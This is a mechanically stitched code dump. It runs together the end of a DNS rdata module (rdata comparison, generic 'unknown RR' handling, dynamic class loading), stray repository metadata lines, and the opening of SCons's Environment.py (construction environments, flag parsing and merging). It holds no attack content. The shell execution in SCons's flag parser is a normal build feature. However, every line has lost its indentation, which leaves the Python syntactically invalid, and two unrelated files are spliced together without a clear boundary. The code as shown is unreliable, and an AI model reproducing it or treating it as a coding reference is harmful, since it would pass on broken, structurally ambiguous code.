@rtype: int
"""
return dns.rdatatype.NONE
def extended_rdatatype(self):
"""Return a 32-bit type value, the least significant 16 bits of
which are the ordinary DNS type, and the upper 16 bits of which are
the "covered" type, if any.
@rtype: int
"""
return self.covers() << 16 | self.rdtype
def to_text(self, origin=None, relativize=True, **kw):
"""Convert an rdata to text format.
@rtype: string
"""
raise NotImplementedError
def to_wire(self, file, compress = None, origin = None):
"""Convert an rdata to wire format.
@rtype: string
"""
raise NotImplementedError
def to_digestable(self, origin = None):
"""Convert rdata to a format suitable for digesting in hashes. This
is also the DNSSEC canonical form."""
f = cStringIO.StringIO()
self.to_wire(f, None, origin)
return f.getvalue()
def validate(self):
"""Check that the current contents of the rdata's fields are
valid. If you change an rdata by assigning to its fields,
it is a good idea to call validate() when you are done making
changes.
"""
dns.rdata.from_text(self.rdclass, self.rdtype, self.to_text())
def __repr__(self):
covers = self.covers()
if covers == dns.rdatatype.NONE:
ctext = ''
else:
ctext = '(' + dns.rdatatype.to_text(covers) + ')'
return '<DNS ' + dns.rdataclass.to_text(self.rdclass) + ' ' + \
dns.rdatatype.to_text(self.rdtype) + ctext + ' rdata: ' + \
str(self) + '>'
def __str__(self):
return self.to_text()
def _cmp(self, other):
"""Compare an rdata with another rdata of the same rdtype and
rdclass. Return < 0 if self < other in the DNSSEC ordering,
0 if self == other, and > 0 if self > other.
"""
raise NotImplementedError
def __eq__(self, other):
if not isinstance(other, Rdata):
return False
if self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return False
return self._cmp(other) == 0
def __ne__(self, other):
if not isinstance(other, Rdata):
return True
if self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return True
return self._cmp(other) != 0
def __lt__(self, other):
if not isinstance(other, Rdata) or \
self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return NotImplemented
return self._cmp(other) < 0
def __le__(self, other):
if not isinstance(other, Rdata) or \
self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return NotImplemented
return self._cmp(other) <= 0
def __ge__(self, other):
if not isinstance(other, Rdata) or \
self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return NotImplemented
return self._cmp(other) >= 0
def __gt__(self, other):
if not isinstance(other, Rdata) or \
self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return NotImplemented
return self._cmp(other) > 0
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
"""Build an rdata object from text format.
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
@param tok: The tokenizer
@type tok: dns.tokenizer.Tokenizer
@param origin: The origin to use for relative names
@type origin: dns.name.Name
@param relativize: should names be relativized?
@type relativize: bool
@rtype: dns.rdata.Rdata instance
"""
raise NotImplementedError
from_text = classmethod(from_text)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
"""Build an rdata object from wire format
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
@param wire: The wire-format message
@type wire: string
@param current: The offet in wire of the beginning of the rdata.
@type current: int
@param rdlen: The length of the wire-format rdata
@type rdlen: int
@param origin: The origin to use for relative names
@type origin: dns.name.Name
@rtype: dns.rdata.Rdata instance
"""
raise NotImplementedError
from_wire = classmethod(from_wire)
def choose_relativity(self, origin = None, relativize = True):
"""Convert any domain names in the rdata to the specified
relativization.
"""
pass
class GenericRdata(Rdata):
"""Generate Rdata Class
This class is used for rdata types for which we have no better
implementation. It implements the DNS "unknown RRs" scheme.
"""
__slots__ = ['data']
def __init__(self, rdclass, rdtype, data):
super(GenericRdata, self).__init__(rdclass, rdtype)
self.data = data
def to_text(self, origin=None, relativize=True, **kw):
return r'\# %d ' % len(self.data) + _hexify(self.data)
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
token = tok.get()
if not token.is_identifier() or token.value != '\#':
raise dns.exception.SyntaxError(r'generic rdata does not start with \#')
length = tok.get_int()
chunks = []
while 1:
token = tok.get()
if token.is_eol_or_eof():
break
chunks.append(token.value)
hex = ''.join(chunks)
data = hex.decode('hex_codec')
if len(data) != length:
raise dns.exception.SyntaxError('generic rdata hex data has wrong length')
return cls(rdclass, rdtype, data)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
file.write(self.data)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
return cls(rdclass, rdtype, wire[current : current + rdlen])
from_wire = classmethod(from_wire)
def _cmp(self, other):
return cmp(self.data, other.data)
_rdata_modules = {}
_module_prefix = 'dns.rdtypes'
def get_rdata_class(rdclass, rdtype):
def import_module(name):
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
mod = _rdata_modules.get((rdclass, rdtype))
rdclass_text = dns.rdataclass.to_text(rdclass)
rdtype_text = dns.rdatatype.to_text(rdtype)
rdtype_text = rdtype_text.replace('-', '_')
if not mod:
mod = _rdata_modules.get((dns.rdatatype.ANY, rdtype))
if not mod:
try:
mod = import_module('.'.join([_module_prefix,
rdclass_text, rdtype_text]))
_rdata_modules[(rdclass, rdtype)] = mod
except ImportError:
try:
mod = import_module('.'.join([_module_prefix,
'ANY', rdtype_text]))
_rdata_modules[(dns.rdataclass.ANY, rdtype)] = mod
except ImportError:
mod = None
if mod:
cls = getattr(mod, rdtype_text)
else:
cls = GenericRdata
return cls
def from_text(rdclass, rdtype, tok, origin = None, relativize = True):
"""Build an rdata object from text format.
This function attempts to dynamically load a class which
implements the specified rdata class and type. If there is no
class-and-type-specific implementation, the GenericRdata class
is used.
Once a class is chosen, its from_text() class method is called
with the parameters to this function.
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
@param tok: The tokenizer
@type tok: dns.tokenizer.Tokenizer
@param origin: The origin to use for relative names
@type origin: dns.name.Name
@param relativize: Should names be relativized?
@type relativize: bool
@rtype: dns.rdata.Rdata instance"""
if isinstance(tok, str):
tok = dns.tokenizer.Tokenizer(tok)
cls = get_rdata_class(rdclass, rdtype)
if cls != GenericRdata:
# peek at first token
token = tok.get()
tok.unget(token)
if token.is_identifier() and \
token.value == r'\#':
#
# Known type using the generic syntax. Extract the
# wire form from the generic syntax, and then run
# from_wire on it.
#
rdata = GenericRdata.from_text(rdclass, rdtype, tok, origin,
relativize)
return from_wire(rdclass, rdtype, rdata.data, 0, len(rdata.data),
origin)
return cls.from_text(rdclass, rdtype, tok, origin, relativize)
def from_wire(rdclass, rdtype, wire, current, rdlen, origin = None):
"""Build an rdata object from wire format
This function attempts to dynamically load a class which
implements the specified rdata class and type. If there is no
class-and-type-specific implementation, the GenericRdata class
is used.
Once a class is chosen, its from_wire() class method is called
with the parameters to this function.
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
@param wire: The wire-format message
@type wire: string
@param current: The offet in wire of the beginning of the rdata.
@type current: int
@param rdlen: The length of the wire-format rdata
@type rdlen: int
@param origin: The origin to use for relative names
@type origin: dns.name.Name
@rtype: dns.rdata.Rdata instance"""
cls = get_rdata_class(rdclass, rdtype)
return cls.from_wire(rdclass, rdtype, wire, current, rdlen, origin)
|
apache-2.0
|
nguyentran/openviber
|
tools/scons-local/scons-local-2.0.1/SCons/Environment.py
|
61
|
91318
|
"""SCons.Environment
Base class for construction Environments. These are
the primary objects used to communicate dependency and
construction information to the build engine.
Keyword arguments supplied when the construction Environment
is created are construction variables used to initialize the
Environment
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Environment.py 5134 2010/08/16 23:02:40 bdeegan"
import copy
import os
import sys
import re
import shlex
from collections import UserDict
import SCons.Action
import SCons.Builder
from SCons.Debug import logInstanceCreation
import SCons.Defaults
import SCons.Errors
import SCons.Memoize
import SCons.Node
import SCons.Node.Alias
import SCons.Node.FS
import SCons.Node.Python
import SCons.Platform
import SCons.SConf
import SCons.SConsign
import SCons.Subst
import SCons.Tool
import SCons.Util
import SCons.Warnings
class _Null(object):
pass
_null = _Null
_warn_copy_deprecated = True
_warn_source_signatures_deprecated = True
_warn_target_signatures_deprecated = True
CleanTargets = {}
CalculatorArgs = {}
semi_deepcopy = SCons.Util.semi_deepcopy
# Pull UserError into the global name space for the benefit of
# Environment().SourceSignatures(), which has some import statements
# which seem to mess up its ability to reference SCons directly.
UserError = SCons.Errors.UserError
def alias_builder(env, target, source):
pass
AliasBuilder = SCons.Builder.Builder(action = alias_builder,
target_factory = SCons.Node.Alias.default_ans.Alias,
source_factory = SCons.Node.FS.Entry,
multi = 1,
is_explicit = None,
name='AliasBuilder')
def apply_tools(env, tools, toolpath):
# Store the toolpath in the Environment.
if toolpath is not None:
env['toolpath'] = toolpath
if not tools:
return
# Filter out null tools from the list.
for tool in [_f for _f in tools if _f]:
if SCons.Util.is_List(tool) or isinstance(tool, tuple):
toolname = tool[0]
toolargs = tool[1] # should be a dict of kw args
tool = env.Tool(toolname, **toolargs)
else:
env.Tool(tool)
# These names are (or will be) controlled by SCons; users should never
# set or override them. This warning can optionally be turned off,
# but scons will still ignore the illegal variable names even if it's off.
reserved_construction_var_names = [
'CHANGED_SOURCES',
'CHANGED_TARGETS',
'SOURCE',
'SOURCES',
'TARGET',
'TARGETS',
'UNCHANGED_SOURCES',
'UNCHANGED_TARGETS',
]
future_reserved_construction_var_names = [
#'HOST_OS',
#'HOST_ARCH',
#'HOST_CPU',
]
def copy_non_reserved_keywords(dict):
result = semi_deepcopy(dict)
for k in result.keys():
if k in reserved_construction_var_names:
msg = "Ignoring attempt to set reserved variable `$%s'"
SCons.Warnings.warn(SCons.Warnings.ReservedVariableWarning, msg % k)
del result[k]
return result
def _set_reserved(env, key, value):
msg = "Ignoring attempt to set reserved variable `$%s'"
SCons.Warnings.warn(SCons.Warnings.ReservedVariableWarning, msg % key)
def _set_future_reserved(env, key, value):
env._dict[key] = value
msg = "`$%s' will be reserved in a future release and setting it will become ignored"
SCons.Warnings.warn(SCons.Warnings.FutureReservedVariableWarning, msg % key)
def _set_BUILDERS(env, key, value):
try:
bd = env._dict[key]
for k in bd.keys():
del bd[k]
except KeyError:
bd = BuilderDict(kwbd, env)
env._dict[key] = bd
for k, v in value.items():
if not SCons.Builder.is_a_Builder(v):
raise SCons.Errors.UserError('%s is not a Builder.' % repr(v))
bd.update(value)
def _del_SCANNERS(env, key):
del env._dict[key]
env.scanner_map_delete()
def _set_SCANNERS(env, key, value):
env._dict[key] = value
env.scanner_map_delete()
def _delete_duplicates(l, keep_last):
"""Delete duplicates from a sequence, keeping the first or last."""
seen={}
result=[]
if keep_last: # reverse in & out, then keep first
l.reverse()
for i in l:
try:
if i not in seen:
result.append(i)
seen[i]=1
except TypeError:
# probably unhashable. Just keep it.
result.append(i)
if keep_last:
result.reverse()
return result
# The following is partly based on code in a comment added by Peter
# Shannon at the following page (there called the "transplant" class):
#
# ASPN : Python Cookbook : Dynamically added methods to a class
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/81732
#
# We had independently been using the idiom as BuilderWrapper, but
# factoring out the common parts into this base class, and making
# BuilderWrapper a subclass that overrides __call__() to enforce specific
# Builder calling conventions, simplified some of our higher-layer code.
class MethodWrapper(object):
"""
A generic Wrapper class that associates a method (which can
actually be any callable) with an object. As part of creating this
MethodWrapper object an attribute with the specified (by default,
the name of the supplied method) is added to the underlying object.
When that new "method" is called, our __call__() method adds the
object as the first argument, simulating the Python behavior of
supplying "self" on method calls.
We hang on to the name by which the method was added to the underlying
base class so that we can provide a method to "clone" ourselves onto
a new underlying object being copied (without which we wouldn't need
to save that info).
"""
def __init__(self, object, method, name=None):
if name is None:
name = method.__name__
self.object = object
self.method = method
self.name = name
setattr(self.object, name, self)
def __call__(self, *args, **kwargs):
nargs = (self.object,) + args
return self.method(*nargs, **kwargs)
def clone(self, new_object):
"""
Returns an object that re-binds the underlying "method" to
the specified new object.
"""
return self.__class__(new_object, self.method, self.name)
class BuilderWrapper(MethodWrapper):
"""
A MethodWrapper subclass that that associates an environment with
a Builder.
This mainly exists to wrap the __call__() function so that all calls
to Builders can have their argument lists massaged in the same way
(treat a lone argument as the source, treat two arguments as target
then source, make sure both target and source are lists) without
having to have cut-and-paste code to do it.
As a bit of obsessive backwards compatibility, we also intercept
attempts to get or set the "env" or "builder" attributes, which were
the names we used before we put the common functionality into the
MethodWrapper base class. We'll keep this around for a while in case
people shipped Tool modules that reached into the wrapper (like the
Tool/qt.py module does, or did). There shouldn't be a lot attribute
fetching or setting on these, so a little extra work shouldn't hurt.
"""
def __call__(self, target=None, source=_null, *args, **kw):
if source is _null:
source = target
target = None
if target is not None and not SCons.Util.is_List(target):
target = [target]
if source is not None and not SCons.Util.is_List(source):
source = [source]
return MethodWrapper.__call__(self, target, source, *args, **kw)
def __repr__(self):
return '<BuilderWrapper %s>' % repr(self.name)
def __str__(self):
return self.__repr__()
def __getattr__(self, name):
if name == 'env':
return self.object
elif name == 'builder':
return self.method
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name == 'env':
self.object = value
elif name == 'builder':
self.method = value
else:
self.__dict__[name] = value
# This allows a Builder to be executed directly
# through the Environment to which it's attached.
# In practice, we shouldn't need this, because
# builders actually get executed through a Node.
# But we do have a unit test for this, and can't
# yet rule out that it would be useful in the
# future, so leave it for now.
#def execute(self, **kw):
# kw['env'] = self.env
# self.builder.execute(**kw)
class BuilderDict(UserDict):
"""This is a dictionary-like class used by an Environment to hold
the Builders. We need to do this because every time someone changes
the Builders in the Environment's BUILDERS dictionary, we must
update the Environment's attributes."""
def __init__(self, dict, env):
# Set self.env before calling the superclass initialization,
# because it will end up calling our other methods, which will
# need to point the values in this dictionary to self.env.
self.env = env
UserDict.__init__(self, dict)
def __semi_deepcopy__(self):
return self.__class__(self.data, self.env)
def __setitem__(self, item, val):
try:
method = getattr(self.env, item).method
except AttributeError:
pass
else:
self.env.RemoveMethod(method)
UserDict.__setitem__(self, item, val)
BuilderWrapper(self.env, val, item)
def __delitem__(self, item):
UserDict.__delitem__(self, item)
delattr(self.env, item)
def update(self, dict):
for i, v in dict.items():
self.__setitem__(i, v)
_is_valid_var = re.compile(r'[_a-zA-Z]\w*$')
def is_valid_construction_var(varstr):
"""Return if the specified string is a legitimate construction
variable.
"""
return _is_valid_var.match(varstr)
class SubstitutionEnvironment(object):
"""Base class for different flavors of construction environments.
This class contains a minimal set of methods that handle contruction
variable expansion and conversion of strings to Nodes, which may or
may not be actually useful as a stand-alone class. Which methods
ended up in this class is pretty arbitrary right now. They're
basically the ones which we've empirically determined are common to
the different construction environment subclasses, and most of the
others that use or touch the underlying dictionary of construction
variables.
Eventually, this class should contain all the methods that we
determine are necessary for a "minimal" interface to the build engine.
A full "native Python" SCons environment has gotten pretty heavyweight
with all of the methods and Tools and construction variables we've
jammed in there, so it would be nice to have a lighter weight
alternative for interfaces that don't need all of the bells and
whistles. (At some point, we'll also probably rename this class
"Base," since that more reflects what we want this class to become,
but because we've released comments that tell people to subclass
Environment.Base to create their own flavors of construction
environment, we'll save that for a future refactoring when this
class actually becomes useful.)
"""
if SCons.Memoize.use_memoizer:
__metaclass__ = SCons.Memoize.Memoized_Metaclass
def __init__(self, **kw):
"""Initialization of an underlying SubstitutionEnvironment class.
"""
if __debug__: logInstanceCreation(self, 'Environment.SubstitutionEnvironment')
self.fs = SCons.Node.FS.get_default_fs()
self.ans = SCons.Node.Alias.default_ans
self.lookup_list = SCons.Node.arg2nodes_lookups
self._dict = kw.copy()
self._init_special()
self.added_methods = []
#self._memo = {}
def _init_special(self):
"""Initial the dispatch tables for special handling of
special construction variables."""
self._special_del = {}
self._special_del['SCANNERS'] = _del_SCANNERS
self._special_set = {}
for key in reserved_construction_var_names:
self._special_set[key] = _set_reserved
for key in future_reserved_construction_var_names:
self._special_set[key] = _set_future_reserved
self._special_set['BUILDERS'] = _set_BUILDERS
self._special_set['SCANNERS'] = _set_SCANNERS
# Freeze the keys of self._special_set in a list for use by
# methods that need to check. (Empirically, list scanning has
# gotten better than dict.has_key() in Python 2.5.)
self._special_set_keys = list(self._special_set.keys())
def __cmp__(self, other):
return cmp(self._dict, other._dict)
def __delitem__(self, key):
special = self._special_del.get(key)
if special:
special(self, key)
else:
del self._dict[key]
def __getitem__(self, key):
return self._dict[key]
def __setitem__(self, key, value):
# This is heavily used. This implementation is the best we have
# according to the timings in bench/env.__setitem__.py.
#
# The "key in self._special_set_keys" test here seems to perform
# pretty well for the number of keys we have. A hard-coded
# list works a little better in Python 2.5, but that has the
# disadvantage of maybe getting out of sync if we ever add more
# variable names. Using self._special_set.has_key() works a
# little better in Python 2.4, but is worse than this test.
# So right now it seems like a good trade-off, but feel free to
# revisit this with bench/env.__setitem__.py as needed (and
# as newer versions of Python come out).
if key in self._special_set_keys:
self._special_set[key](self, key, value)
else:
# If we already have the entry, then it's obviously a valid
# key and we don't need to check. If we do check, using a
# global, pre-compiled regular expression directly is more
# efficient than calling another function or a method.
if key not in self._dict \
and not _is_valid_var.match(key):
raise SCons.Errors.UserError("Illegal construction variable `%s'" % key)
self._dict[key] = value
def get(self, key, default=None):
"""Emulates the get() method of dictionaries."""
return self._dict.get(key, default)
def has_key(self, key):
return key in self._dict
def __contains__(self, key):
return self._dict.__contains__(key)
def items(self):
return list(self._dict.items())
def arg2nodes(self, args, node_factory=_null, lookup_list=_null, **kw):
if node_factory is _null:
node_factory = self.fs.File
if lookup_list is _null:
lookup_list = self.lookup_list
if not args:
return []
args = SCons.Util.flatten(args)
nodes = []
for v in args:
if SCons.Util.is_String(v):
n = None
for l in lookup_list:
n = l(v)
if n is not None:
break
if n is not None:
if SCons.Util.is_String(n):
# n = self.subst(n, raw=1, **kw)
kw['raw'] = 1
n = self.subst(n, **kw)
if node_factory:
n = node_factory(n)
if SCons.Util.is_List(n):
nodes.extend(n)
else:
nodes.append(n)
elif node_factory:
# v = node_factory(self.subst(v, raw=1, **kw))
kw['raw'] = 1
v = node_factory(self.subst(v, **kw))
if SCons.Util.is_List(v):
nodes.extend(v)
else:
nodes.append(v)
else:
nodes.append(v)
return nodes
def gvars(self):
return self._dict
def lvars(self):
return {}
def subst(self, string, raw=0, target=None, source=None, conv=None, executor=None):
"""Recursively interpolates construction variables from the
Environment into the specified string, returning the expanded
result. Construction variables are specified by a $ prefix
in the string and begin with an initial underscore or
alphabetic character followed by any number of underscores
or alphanumeric characters. The construction variable names
may be surrounded by curly braces to separate the name from
trailing characters.
"""
gvars = self.gvars()
lvars = self.lvars()
lvars['__env__'] = self
if executor:
lvars.update(executor.get_lvars())
return SCons.Subst.scons_subst(string, self, raw, target, source, gvars, lvars, conv)
def subst_kw(self, kw, raw=0, target=None, source=None):
nkw = {}
for k, v in kw.items():
k = self.subst(k, raw, target, source)
if SCons.Util.is_String(v):
v = self.subst(v, raw, target, source)
nkw[k] = v
return nkw
def subst_list(self, string, raw=0, target=None, source=None, conv=None, executor=None):
"""Calls through to SCons.Subst.scons_subst_list(). See
the documentation for that function."""
gvars = self.gvars()
lvars = self.lvars()
lvars['__env__'] = self
if executor:
lvars.update(executor.get_lvars())
return SCons.Subst.scons_subst_list(string, self, raw, target, source, gvars, lvars, conv)
def subst_path(self, path, target=None, source=None):
"""Substitute a path list, turning EntryProxies into Nodes
and leaving Nodes (and other objects) as-is."""
if not SCons.Util.is_List(path):
path = [path]
def s(obj):
"""This is the "string conversion" routine that we have our
substitutions use to return Nodes, not strings. This relies
on the fact that an EntryProxy object has a get() method that
returns the underlying Node that it wraps, which is a bit of
architectural dependence that we might need to break or modify
in the future in response to additional requirements."""
try:
get = obj.get
except AttributeError:
obj = SCons.Util.to_String_for_subst(obj)
else:
obj = get()
return obj
r = []
for p in path:
if SCons.Util.is_String(p):
p = self.subst(p, target=target, source=source, conv=s)
if SCons.Util.is_List(p):
if len(p) == 1:
p = p[0]
else:
# We have an object plus a string, or multiple
# objects that we need to smush together. No choice
# but to make them into a string.
p = ''.join(map(SCons.Util.to_String_for_subst, p))
else:
p = s(p)
r.append(p)
return r
subst_target_source = subst
def backtick(self, command):
import subprocess
# common arguments
kw = { 'stdin' : 'devnull',
'stdout' : subprocess.PIPE,
'stderr' : subprocess.PIPE,
'universal_newlines' : True,
}
# if the command is a list, assume it's been quoted
# othewise force a shell
if not SCons.Util.is_List(command): kw['shell'] = True
# run constructed command
p = SCons.Action._subproc(self, command, **kw)
out,err = p.communicate()
status = p.wait()
if err:
sys.stderr.write(unicode(err))
if status:
raise OSError("'%s' exited %d" % (command, status))
return out
def AddMethod(self, function, name=None):
"""
Adds the specified function as a method of this construction
environment with the specified name. If the name is omitted,
the default name is the name of the function itself.
"""
method = MethodWrapper(self, function, name)
self.added_methods.append(method)
def RemoveMethod(self, function):
"""
Removes the specified function's MethodWrapper from the
added_methods list, so we don't re-bind it when making a clone.
"""
self.added_methods = [dm for dm in self.added_methods if not dm.method is function]
def Override(self, overrides):
"""
Produce a modified environment whose variables are overriden by
the overrides dictionaries. "overrides" is a dictionary that
will override the variables of this environment.
This function is much more efficient than Clone() or creating
a new Environment because it doesn't copy the construction
environment dictionary, it just wraps the underlying construction
environment, and doesn't even create a wrapper object if there
are no overrides.
"""
if not overrides: return self
o = copy_non_reserved_keywords(overrides)
if not o: return self
overrides = {}
merges = None
for key, value in o.items():
if key == 'parse_flags':
merges = value
else:
overrides[key] = SCons.Subst.scons_subst_once(value, self, key)
env = OverrideEnvironment(self, overrides)
if merges: env.MergeFlags(merges)
return env
def ParseFlags(self, *flags):
"""
Parse the set of flags and return a dict with the flags placed
in the appropriate entry. The flags are treated as a typical
set of command-line flags for a GNU-like toolchain and used to
populate the entries in the dict immediately below. If one of
the flag strings begins with a bang (exclamation mark), it is
assumed to be a command and the rest of the string is executed;
the result of that evaluation is then added to the dict.
"""
dict = {
'ASFLAGS' : SCons.Util.CLVar(''),
'CFLAGS' : SCons.Util.CLVar(''),
'CCFLAGS' : SCons.Util.CLVar(''),
'CPPDEFINES' : [],
'CPPFLAGS' : SCons.Util.CLVar(''),
'CPPPATH' : [],
'FRAMEWORKPATH' : SCons.Util.CLVar(''),
'FRAMEWORKS' : SCons.Util.CLVar(''),
'LIBPATH' : [],
'LIBS' : [],
'LINKFLAGS' : SCons.Util.CLVar(''),
'RPATH' : [],
}
def do_parse(arg):
# if arg is a sequence, recurse with each element
if not arg:
return
if not SCons.Util.is_String(arg):
for t in arg: do_parse(t)
return
# if arg is a command, execute it
if arg[0] == '!':
arg = self.backtick(arg[1:])
# utility function to deal with -D option
def append_define(name, dict = dict):
t = name.split('=')
if len(t) == 1:
dict['CPPDEFINES'].append(name)
else:
dict['CPPDEFINES'].append([t[0], '='.join(t[1:])])
# Loop through the flags and add them to the appropriate option.
# This tries to strike a balance between checking for all possible
# flags and keeping the logic to a finite size, so it doesn't
# check for some that don't occur often. It particular, if the
# flag is not known to occur in a config script and there's a way
# of passing the flag to the right place (by wrapping it in a -W
# flag, for example) we don't check for it. Note that most
# preprocessor options are not handled, since unhandled options
# are placed in CCFLAGS, so unless the preprocessor is invoked
# separately, these flags will still get to the preprocessor.
# Other options not currently handled:
# -iqoutedir (preprocessor search path)
# -u symbol (linker undefined symbol)
# -s (linker strip files)
# -static* (linker static binding)
# -shared* (linker dynamic binding)
# -symbolic (linker global binding)
# -R dir (deprecated linker rpath)
# IBM compilers may also accept -qframeworkdir=foo
params = shlex.split(arg)
append_next_arg_to = None # for multi-word args
for arg in params:
if append_next_arg_to:
if append_next_arg_to == 'CPPDEFINES':
append_define(arg)
elif append_next_arg_to == '-include':
t = ('-include', self.fs.File(arg))
dict['CCFLAGS'].append(t)
elif append_next_arg_to == '-isysroot':
t = ('-isysroot', arg)
dict['CCFLAGS'].append(t)
dict['LINKFLAGS'].append(t)
elif append_next_arg_to == '-arch':
t = ('-arch', arg)
dict['CCFLAGS'].append(t)
dict['LINKFLAGS'].append(t)
else:
dict[append_next_arg_to].append(arg)
append_next_arg_to = None
elif not arg[0] in ['-', '+']:
dict['LIBS'].append(self.fs.File(arg))
elif arg[:2] == '-L':
if arg[2:]:
dict['LIBPATH'].append(arg[2:])
else:
append_next_arg_to = 'LIBPATH'
elif arg[:2] == '-l':
if arg[2:]:
dict['LIBS'].append(arg[2:])
else:
append_next_arg_to = 'LIBS'
elif arg[:2] == '-I':
if arg[2:]:
dict['CPPPATH'].append(arg[2:])
else:
append_next_arg_to = 'CPPPATH'
elif arg[:4] == '-Wa,':
dict['ASFLAGS'].append(arg[4:])
dict['CCFLAGS'].append(arg)
elif arg[:4] == '-Wl,':
if arg[:11] == '-Wl,-rpath=':
dict['RPATH'].append(arg[11:])
elif arg[:7] == '-Wl,-R,':
dict['RPATH'].append(arg[7:])
elif arg[:6] == '-Wl,-R':
dict['RPATH'].append(arg[6:])
else:
dict['LINKFLAGS'].append(arg)
elif arg[:4] == '-Wp,':
dict['CPPFLAGS'].append(arg)
elif arg[:2] == '-D':
if arg[2:]:
append_define(arg[2:])
else:
append_next_arg_to = 'CPPDEFINES'
elif arg == '-framework':
append_next_arg_to = 'FRAMEWORKS'
elif arg[:14] == '-frameworkdir=':
dict['FRAMEWORKPATH'].append(arg[14:])
elif arg[:2] == '-F':
if arg[2:]:
dict['FRAMEWORKPATH'].append(arg[2:])
else:
append_next_arg_to = 'FRAMEWORKPATH'
elif arg == '-mno-cygwin':
dict['CCFLAGS'].append(arg)
dict['LINKFLAGS'].append(arg)
elif arg == '-mwindows':
dict['LINKFLAGS'].append(arg)
elif arg == '-pthread':
dict['CCFLAGS'].append(arg)
dict['LINKFLAGS'].append(arg)
elif arg[:5] == '-std=':
dict['CFLAGS'].append(arg) # C only
elif arg[0] == '+':
dict['CCFLAGS'].append(arg)
dict['LINKFLAGS'].append(arg)
elif arg in ['-include', '-isysroot', '-arch']:
append_next_arg_to = arg
else:
dict['CCFLAGS'].append(arg)
for arg in flags:
do_parse(arg)
return dict
def MergeFlags(self, args, unique=1, dict=None):
"""
Merge the dict in args into the construction variables of this
env, or the passed-in dict. If args is not a dict, it is
converted into a dict using ParseFlags. If unique is not set,
the flags are appended rather than merged.
"""
if dict is None:
dict = self
if not SCons.Util.is_Dict(args):
args = self.ParseFlags(args)
if not unique:
self.Append(**args)
return self
for key, value in args.items():
if not value:
continue
try:
orig = self[key]
except KeyError:
orig = value
else:
if not orig:
orig = value
elif value:
# Add orig and value. The logic here was lifted from
# part of env.Append() (see there for a lot of comments
# about the order in which things are tried) and is
# used mainly to handle coercion of strings to CLVar to
# "do the right thing" given (e.g.) an original CCFLAGS
# string variable like '-pipe -Wall'.
try:
orig = orig + value
except (KeyError, TypeError):
try:
add_to_orig = orig.append
except AttributeError:
value.insert(0, orig)
orig = value
else:
add_to_orig(value)
t = []
if key[-4:] == 'PATH':
### keep left-most occurence
for v in orig:
if v not in t:
t.append(v)
else:
### keep right-most occurence
orig.reverse()
for v in orig:
if v not in t:
t.insert(0, v)
self[key] = t
return self
# def MergeShellPaths(self, args, prepend=1):
# """
# Merge the dict in args into the shell environment in env['ENV'].
# Shell path elements are appended or prepended according to prepend.
# Uses Pre/AppendENVPath, so it always appends or prepends uniquely.
# Example: env.MergeShellPaths({'LIBPATH': '/usr/local/lib'})
# prepends /usr/local/lib to env['ENV']['LIBPATH'].
# """
# for pathname, pathval in args.items():
# if not pathval:
# continue
# if prepend:
# self.PrependENVPath(pathname, pathval)
# else:
# self.AppendENVPath(pathname, pathval)
def default_decide_source(dependency, target, prev_ni):
f = SCons.Defaults.DefaultEnvironment().decide_source
return f(dependency, target, prev_ni)
def default_decide_target(dependency, target, prev_ni):
f = SCons.Defaults.DefaultEnvironment().decide_target
return f(dependency, target, prev_ni)
def default_copy_from_cache(src, dst):
f = SCons.Defaults.DefaultEnvironment().copy_from_cache
return f(src, dst)
class Base(SubstitutionEnvironment):
"""Base class for "real" construction Environments. These are the
primary objects used to communicate dependency and construction
information to the build engine.
Keyword arguments supplied when the construction Environment
is created are construction variables used to initialize the
Environment.
"""
memoizer_counters = []
#######################################################################
# This is THE class for interacting with the SCons build engine,
# and it contains a lot of stuff, so we're going to try to keep this
# a little organized by grouping the methods.
#######################################################################
#######################################################################
# Methods that make an Environment act like a dictionary. These have
# the expected standard names for Python mapping objects. Note that
# we don't actually make an Environment a subclass of UserDict for
# performance reasons. Note also that we only supply methods for
# dictionary functionality that we actually need and use.
#######################################################################
def __init__(self,
platform=None,
tools=None,
toolpath=None,
variables=None,
parse_flags = None,
**kw):
"""
Initialization of a basic SCons construction environment,
including setting up special construction variables like BUILDER,
PLATFORM, etc., and searching for and applying available Tools.
Note that we do *not* call the underlying base class
(SubsitutionEnvironment) initialization, because we need to
initialize things in a very specific order that doesn't work
with the much simpler base class initialization.
"""
